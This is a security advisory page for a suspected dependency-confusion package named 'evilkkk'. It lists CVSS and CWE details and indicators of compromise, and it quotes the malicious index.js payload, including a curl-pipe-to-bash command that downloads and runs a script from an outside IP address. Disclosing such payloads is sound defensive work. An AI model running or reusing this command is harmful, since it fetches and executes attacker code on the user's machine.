VDB

GCVE-110-OSM-2026-1558

GCVE-110-OSM-2026-1558
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 8, 2026
Suspected dependency confusion attack. Behaviors: code execution, network activity. Payload: index.js Key findings: - Download and Execute in index.js: "curl http:/39.107.154.164:8080/1.sh|bash" - Shell Command Execution in index.js: "child_process").exec" IOCs: - ipv4: 39.107.154.164 - domains: 1.sh - payloadFileHash: c58377fb3c21d4361045864ed5a04bf931b07e93b82c7fed4076b94017b95269

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownevilkkkall (affected)

References

vendor

Browse GCVE Records

72,409 records in the GCVE database · Updated July 14, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›